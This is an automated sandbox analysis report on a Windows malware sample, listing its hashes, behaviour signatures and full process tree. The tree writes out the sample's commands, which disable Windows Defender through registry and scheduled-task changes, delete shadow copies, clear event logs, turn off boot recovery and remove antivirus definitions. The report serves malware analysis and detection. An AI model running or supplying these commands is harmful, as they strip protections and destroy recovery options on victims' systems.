Resubmissions

23-12-2022 20:19

221223-y39gvahb28 10

23-12-2022 19:54

221223-ymz88scc8w 10

23-12-2022 19:42

221223-yerbcsha78 10

Analysis

  • max time kernel
    134s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2022 19:42

General

  • Target

    211xahcou.exe

  • Size

    3.9MB

  • MD5

    0e4d44dde522c07d09d9e3086cfae803

  • SHA1

    d8dc26e2094869a0da78ecb47494c931419302dc

  • SHA256

    33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277

  • SHA512

    ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06

  • SSDEEP

    49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
    "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\Windows\system32\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:1480
      • C:\Windows\system32\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:1392
        • C:\Windows\system32\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:1188
          • C:\Windows\system32\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1816
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:1768
            • C:\Windows\system32\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:632
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:776
              • C:\Windows\system32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1692
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:336
                • C:\Windows\system32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1176
                  • C:\Windows\system32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1564
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:1948
                    • C:\Windows\system32\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1432
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SamSs" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1940
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SDRSVC" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1992
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SstpSvc" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1420
                    • C:\Windows\system32\sc.exe
                      sc.exe config "UI0Detect" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:880
                    • C:\Windows\system32\sc.exe
                      sc.exe config "VSS" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1528
                    • C:\Windows\system32\sc.exe
                      sc.exe config "wbengine" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1956
                    • C:\Windows\system32\sc.exe
                      sc.exe config "WebClient" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1716
                    • C:\Windows\system32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:1068
                      • C:\Windows\system32\reg.exe
                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        2⤵
                          PID:860
                        • C:\Windows\system32\reg.exe
                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                          2⤵
                            PID:1220
                          • C:\Windows\system32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            2⤵
                              PID:816
                            • C:\Windows\system32\reg.exe
                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                              2⤵
                                PID:1756
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1704
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1964
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1196
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:836
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1740
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                2⤵
                                  PID:940
                                • C:\Windows\system32\reg.exe
                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:808
                                  • C:\Windows\system32\reg.exe
                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:1276
                                    • C:\Windows\system32\reg.exe
                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:380
                                      • C:\Windows\system32\reg.exe
                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:1580
                                        • C:\Windows\system32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:512
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                            2⤵
                                              PID:1376
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                              2⤵
                                                PID:680
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                2⤵
                                                  PID:1412
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  2⤵
                                                    PID:1208
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                    2⤵
                                                      PID:1980
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                      2⤵
                                                        PID:684
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                        2⤵
                                                          PID:2032
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                          2⤵
                                                            PID:276
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                            2⤵
                                                              PID:1116
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                              2⤵
                                                                PID:1428
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                2⤵
                                                                  PID:1728
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                  2⤵
                                                                    PID:728
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                    2⤵
                                                                      PID:1708
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                      2⤵
                                                                        PID:336
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                        2⤵
                                                                          PID:1948
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                          • Modifies security service
                                                                          PID:916
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                            PID:1408
                                                                          • C:\Windows\system32\vssadmin.exe
                                                                            vssadmin.exe delete shadows /all /quiet
                                                                            2⤵
                                                                            • Interacts with shadow copies
                                                                            PID:756
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl system
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1648
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl security
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1652
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl application
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1480
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:944
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe shadowcopy delete
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1968
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:1792
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:1604
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                            2⤵
                                                                              PID:1300
                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                3⤵
                                                                                • Deletes Windows Defender Definitions
                                                                                PID:1160
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                              2⤵
                                                                                PID:988
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  3⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1812
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                2⤵
                                                                                  PID:1712
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1768

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v6

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                518486dffec7d61e97730f9dc6c24aaa

                                                                                SHA1

                                                                                6198cb33b781deec8a1e9b538a57b04704057343

                                                                                SHA256

                                                                                f109291c5abe9f0acd84f50f989803423c862aca638978f6b111b65d486abfba

                                                                                SHA512

                                                                                c5cb08510662c00356f75b396e186ed5da16e08c4ed34226531401fa22eff925ba2f92a559a73299df68b6631812a92c0a944bb958c3563db44e8e43d90462da

                                                                              • memory/1648-113-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/1768-131-0x00000000023D4000-0x00000000023D7000-memory.dmp

                                                                                Filesize

                                                                                12KB

                                                                              • memory/1768-133-0x00000000023DB000-0x00000000023FA000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/1768-132-0x00000000023D4000-0x00000000023D7000-memory.dmp

                                                                                Filesize

                                                                                12KB

                                                                              • memory/1768-130-0x000007FEF2F80000-0x000007FEF3ADD000-memory.dmp

                                                                                Filesize

                                                                                11.4MB

                                                                              • memory/1768-129-0x000007FEF3AE0000-0x000007FEF4503000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/1812-125-0x000000000279B000-0x00000000027BA000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/1812-126-0x000000000279B000-0x00000000027BA000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/1812-124-0x0000000002794000-0x0000000002797000-memory.dmp

                                                                                Filesize

                                                                                12KB

                                                                              • memory/1812-122-0x000007FEF3140000-0x000007FEF3B63000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/1812-123-0x000007FEF25E0000-0x000007FEF313D000-memory.dmp

                                                                                Filesize

                                                                                11.4MB